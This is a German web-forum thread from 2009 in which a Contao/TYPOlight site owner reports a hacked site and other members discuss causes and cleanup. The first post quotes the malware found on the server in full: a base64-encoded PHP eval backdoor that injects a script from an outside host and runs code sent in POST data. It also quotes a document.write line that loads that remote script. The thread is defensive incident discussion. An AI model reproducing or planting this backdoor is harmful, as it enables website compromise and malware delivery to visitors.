Ergebnis 1 bis 15 von 15

Thema: Seite gehackt worden? Woher kommt das?

  1. #1
    Contao-Nutzer
    Registriert seit
    01.08.2009.
    Beiträge
    33

    Standard Seite gehackt worden? Woher kommt das?

    Hallo zusammen!
    Ich habe eben eine meiner Seiten besucht und festgestellt, dass diese nicht funktioniert
    Als Fehlermeldung kam in etwa folgendes:
    Fatal error: Cannot redeclare nogc() (previously declared in /srv/www/htdocs/web288/html/system/constants.php(1) : eval()'d code:1) in /srv/www/htdocs/web288/html/system/libraries/Config.php(1) : eval()'d code on line 1
    In einigen Dateien habe ich folgenden Code entdeckt:
    PHP-Code:
    <?php eval(base64_decode('aWYoIWlzc2V0KCRub2djMSkpe2Z1bmN0aW9uIG5vZ2MoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyVnNaWFpsWkdGdWVtRXVZMjl0TDJGeVkyaHBkbTl6TDB4QlgwNUJRMGxQVGw4eU1EQTRMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gbm9nYzIoJGEsJGIsJGMsJGQpe2dsb2JhbCAkbm9nYzE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJG5vZ2MxKSljYWxsX3VzZXJfZnVuYygkbm9nYzEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSkgYXMgJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nbm9nYycpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdub2djJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JG5vZ2NsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdub2djMicpKSE9J25vZ2MyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>
    Wurde die Seite gehackt? Woher kommt das? Vor ca. 30 Minuten lief die Seite noch einwandfrei.
    Grüße
    Markus

    //EDIT:
    in einigen js-Scripts finde ich einen Bezug auf folgendes Script
    Code:
    document.write('<script src=http://elevedanza.com/archivos/LA_NACION_2008.php ><\/script>');
    Geändert von markusger (11.10.2009 um 17:13 Uhr)

  2. #2
    Contao-Fan
    Registriert seit
    19.06.2009.
    Ort
    Greven
    Beiträge
    357

    Standard

    Das könnte evtl ein Virus sein, der sich eingeschlichen hat!?
    Hatte auch einmal so ein Problem und konnte es mit "G-Data" lösen.

    Gruß, Frank

  3. #3
    Administrator Avatar von Nina
    Registriert seit
    04.06.2009.
    Ort
    Hamburg
    Beiträge
    4.755
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Es handelt sich ziemlich sicher um Schadsoftware die eingeschleust wurde. Allerdings gehe ich nicht davon aus, dass die Ursache TL ist (war bisher in vergleichbaren Gründen nie so gewesen), sondern entweder der Server gehacked oder dein PC infiltriert wurde.

    Möglichkeiten wie das passieren konnte, gibt es viele:
    • Der ganze Server wurde vielleicht z. B. aufgrund veralteter darauf laufender Software gehackt (erkennt man daran, wenn andere Webhosting-Kunden auf dem gleichen Server ebenfalls diesen Code aufweisen)
    • Dein Webspace wurde vielleicht gehackt; liegt meist an unsicheren Scripts die sich irgendwo darauf befinden; oft z. B. veraltete oder selbst erstellte Scripte die nicht gegen XSS oder ähnlichen Lücken gesichert sind
    • vielleicht geklaute FTP-Passwörter (z. B. über Fake-Seitenverlinkungen in Websites)
    • Du nutzt vielleicht veraltete Software in der Lücken ausgenutzt wurden. Es kam z. B. öfter vor, wenn Leute Filezilla in alten Versionen einsetzten!


    Ein ähnlicher Beitrag ist hier zu finden.

  4. #4
    Contao-Hauptentwickler
    AG Core-Entwicklung
    Avatar von leo
    Registriert seit
    05.06.2009.
    Ort
    Wuppertal
    Beiträge
    816

    Standard

    Ich hatte eben den exakt selben Fall bei einem Kunden. Es ist äußerst wichtig darauf zu achten, den Schadcode nicht nur aus der index.php zu entfernen! In meinem Fall waren sämtliche index.php-Dateien, sämtliche config/*.php-Dateien, die system/*.php-Dateien, alle DB-Driver, die TCPDF-Konfigurationsdatei und seltsamerweise alle Klassen der Erweiterung BackupDB betroffen. Der Angreifer ist sehr überlegt vorgegangen und hat offensichtlich gewusst, welches System er hackt!

    Die betroffenen Dateien findet man am besten über die Kommandozeile:
    Code:
    find /pfad/zu/typolight -name '*.php' | xargs grep aWYoIWlzc2V0KCRvY28
    Der Teil hinter dem "grep" ist der Such-String, der durch den jeweiligen Schadcode zu ersetzen ist. Falls keine Suche in den Dateien möglich ist, sollte man zur Sicherheit die komplette TYPOlight-Installation ersetzen.

    Selbstverständlich sind sofort alle Passwörter zu ändern und ein ordentliches FTP-Programm anzuschaffen.

  5. #5
    Contao-Fan
    Registriert seit
    19.06.2009.
    Ort
    Greven
    Beiträge
    357

    Standard

    Hallo Leo,

    so wie ich das in Erinnerung habe, werden auch JS-Dateien verseucht! Bitte einmal prüfen.

    Gruß, Frank

  6. #6
    Contao-Fan Avatar von Stephan
    Registriert seit
    19.06.2009.
    Ort
    Berlin
    Beiträge
    349

    Standard

    Zum Thema Schadcode ist dieser Google-Artikel evtl. für den ein oder anderen von Interesse. Mit den Webmaster-Tools kann man nun detaillierte Informationen zu dem monierten Code abrufen, um einem solchen Problem schneller auf die Spur zu kommen.

  7. #7
    Contao-Hauptentwickler
    AG Core-Entwicklung
    Avatar von leo
    Registriert seit
    05.06.2009.
    Ort
    Wuppertal
    Beiträge
    816

    Standard

    Nachdem dieser spezielle Exploit eine PHP-Anweisung beinhaltet (siehe Post von markusger), schien mir die Prüfung der PHP-Dateien ausreichend. Aber Leo (Unglaub) hat Recht, im Zweifel sollte man alle Dateien prüfen.

  8. #8
    Contao-Urgestein Avatar von Thomas
    Registriert seit
    16.08.2009.
    Ort
    Visselhövede
    Beiträge
    1.947
    User beschenken
    Wunschliste

    Standard

    Ist das jetzt ein Problem von Typolight, oder kommt das von woanders?

    Was ist mit Windowsservern?

    Ich kann mich erinnern, mir sowas mal Lokal eingefangen zu haben.
    Da sorgte ein Virus/Wurm für die Infektion von allen index Dateien (php, html, htm usw.).

    Ist jetzt nur zu lange her, dass ich nähere Infos geben könnte.

    Bekannte und aktuelle Exploits für TL finde ich immer noch nicht.
    Ich gehe aber davon aus, je bekannter TL wird, gerät es auch in einen größeren Fokus der Hacker.

    Wie sieht das bei Erweiterungen aus, die externe Dateien einfügen?
    Werden diese explizit von TL geprüft?

    Sind ja alles Fragen, die aufkommen werden.
    Gruß Thomas
    "Zuerst ignorieren sie dich, dann lachen sie über dich, dann bekämpfen sie dich und dann gewinnst du." Mahatma Gandhi

  9. #9
    Contao-Urgestein Avatar von FloB
    Registriert seit
    19.06.2009.
    Ort
    Sonnensystem
    Beiträge
    1.618

    Standard

    Das klingt mir alles sehr nach einem direkten FTP-Zugriff aus – wenn ein PHP-Script verwendet wurde (was eingeschleust hätte werden können), würde man dieses Script sehen oder in den Logdateien (Apache) einen entsprechenden Aufruf finden. Die TL-HTACCESS blockiert aber (wenn aktiviert) letztere Angriffe automatisch. Bleibt also eigentlich nur der FTP-Zugriff.
    So long,
    FloB since Nov. 2007 +706P +115P and counting

  10. #10
    Contao-Yoda Avatar von MacKP
    Registriert seit
    15.06.2009.
    Ort
    Duisburg
    Beiträge
    13.292
    User beschenken
    Wunschliste
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Sehr häufig ist es einfach ein trojaner auf dem lokalen System, welcher die ftp Passwörter ausliest (Filezilla hatte zum beispiel in ältern Versionen einen Bug, der so etwas ganz einfach ermöglichte). Und genau das ist auch die meist verbreitetste Variante. Ist bei den ganzen Windows Rechnern an denen Leute mit Admin rechten arbeiten ja auch kein großes Problem ;-)

    Viele Grüße
    Contao Pool | C-C-A | MetaModels | [Internetseite -> Mediendepot Ruhr]
    [Arbeitet bei -> Paus Design & Medien]
    "I can EXPLAIN it to you, but I can't UNDERSTAND it for you."

  11. #11
    Contao-Urgestein Avatar von Thomas
    Registriert seit
    16.08.2009.
    Ort
    Visselhövede
    Beiträge
    1.947
    User beschenken
    Wunschliste

    Standard

    @leo.unglaub
    Das sind Preventivfragen, die ohnehin aufkommen.
    Dann gleich lieber vorweg klären und es bleibt ruhig.
    Wichtig sind die Fragen allemal, alleine schon für Argumentationen dem Anbieter gegenüber.
    Nutzer von Webspace haben schließlich oft wesentlich mehr Seiten auf dem Server, ohne das sie es vielleicht wissen. Und von deren Seiten besteht oft die Gefahr.
    Wie oft hat man sowas schon bei Kunden oder selber erleben müßen.

    Und sowas hat nichts mit Paranoia zutun, sondern eher zum Schutze von erstellten Seiten.
    Nichts für ungut.

    Windows oder Linux?
    Diese Frage stellt sich für mich selber nicht. Es existieren aber beide Systeme und beide werden auch genutzt. Zumal nicht jeder genau weiß was er tut.

    An dieser Diskusion werde ich mich auch nicht beteiligen, sollte es dazu mal wieder kommen.
    Gruß Thomas
    "Zuerst ignorieren sie dich, dann lachen sie über dich, dann bekämpfen sie dich und dann gewinnst du." Mahatma Gandhi

  12. #12
    Contao-Nutzer
    Registriert seit
    01.08.2009.
    Beiträge
    33

    Standard

    Hallo zusammen,
    ich möchte euch kurz auf den aktuellen Kenntnisstand bringen.

    Zum System selbst: ich habe dort einfach das letzte Backup aufgespielt. Damit sind alle Dateien überschrieben worden. Da bin ich einfach auch Nummer sicher gegangen.

    Die entsprechenden Passwörter wurden alle geändert.

    Der Hoster selbst hat nach seiner Auskunft kein fremdes Eindringen feststellen können. Der Verdacht liegt also nahe, dass das FTP-Passwort ausgespäht wurde. In diesem Zuge hatte ich aber bereits sofort nach dem feststellen des Angriffs alle Passwörter durch neue zufallsgeneriete Passwörter geändert.

    Was mich im moment jedoch noch stutzig macht: Ich konnte nirgendwo den Grund für das abhandenkommen der Passwörter feststellen. Mein PC ist virenfrei. Filezilla war auf der aktuellsten Version. Das Passwort selbst war kryptisch. Da hätte nur Bruteforce Sinn gemacht, was aber laut Logfile nicht der Fall war.
    Schon seltsam.

    Soweit erstmal. Danke auch für eure Hilfe!
    Grüße
    Markus

  13. #13
    Maintainer Avatar von xtra
    Registriert seit
    02.07.2009.
    Ort
    Tuebingen
    Beiträge
    2.007
    User beschenken
    Wunschliste

    Standard

    Sofern du ein backup vom gehackten system angelegt hast, checke dort doch dein ftp daemon log, welcher user die Dateien veraendert/hochgeladen hat und wann es war. Das koennte dir weiterhelfen.

    Das Problem hatten wir, mit anderem Schadcode, auch einmal bei einem Kunden von uns.
    Problematisch ist das speichern von Passwoertern immer, da sie immer auch ausgelesen werden koennen (liegt in der Natur der Sache, ansonsten braeuchte man sie ja nicht einspeichern).
    Daher sollte man es, besonders bei kritischen Dingen, lassen!

    Gruss
    Chris
    Bedenke stets: Wenn Du ungenaue oder unzureichende Angaben machst, so koennte dies die Bearbeitung deiner Frage endlos verzoegern (oder sogar dazu fyhren, dass ich zu viel nachdenken muss und die Antwort vergesse!). Kein Support per PN.

  14. #14
    Contao-Urgestein Avatar von FloB
    Registriert seit
    19.06.2009.
    Ort
    Sonnensystem
    Beiträge
    1.618

    Standard

    Zitat Zitat von markusger Beitrag anzeigen
    Mein PC ist virenfrei.
    Wer's glaubt, wird selig .
    Nein, im Ernst, dass ein Virenprogramm nichts findet, heißt nicht, dass dein PC virenfrei ist. Das Virenprogramm hat einfach keinen ihm bekannten Virus gefunden – oder wurde vielleicht sogar untergraben?

    Hast du mal einen Rootkit-Scanner laufen lassen?
    So long,
    FloB since Nov. 2007 +706P +115P and counting

  15. #15
    Contao-Nutzer Avatar von zed
    Registriert seit
    21.06.2009.
    Ort
    Basel
    Beiträge
    5
    Partner-ID
    5928

    Standard

    Hallo Markus
    Zitat Zitat von markusger Beitrag anzeigen
    Was mich im moment jedoch noch stutzig macht: Ich konnte nirgendwo den Grund für das abhandenkommen der Passwörter feststellen. Mein PC ist virenfrei. Filezilla war auf der aktuellsten Version. Das Passwort selbst war kryptisch. Da hätte nur Bruteforce Sinn gemacht, was aber laut Logfile nicht der Fall war.
    Schon seltsam.
    Versuche, falls Du es nicht schon tust bzw. wenn es dein Hoster unterstützt, SFTP zu verwenden. Bei "normalem" FTP werden Benutzername und Passwort im Klartext übertragen.

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Ähnliche Themen

  1. Contao Website gehackt?
    Von TonCao im Forum Sonstiges zu Contao
    Antworten: 48
    Letzter Beitrag: 17.10.2012, 23:58
  2. Woher krieg ich die Erweiterungsverwaltung?
    Von alinstyle im Forum Installation / Update
    Antworten: 6
    Letzter Beitrag: 05.08.2010, 11:19
  3. Antworten: 8
    Letzter Beitrag: 09.07.2010, 12:00
  4. Mein Typo gehackt ???
    Von matmac im Forum Off Topic
    Antworten: 6
    Letzter Beitrag: 30.01.2010, 14:56
  5. install Passwort richtig aber danach kommt Seite nicht gefunden!
    Von Frosty5o im Forum Installation / Update
    Antworten: 8
    Letzter Beitrag: 21.10.2009, 07:50

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •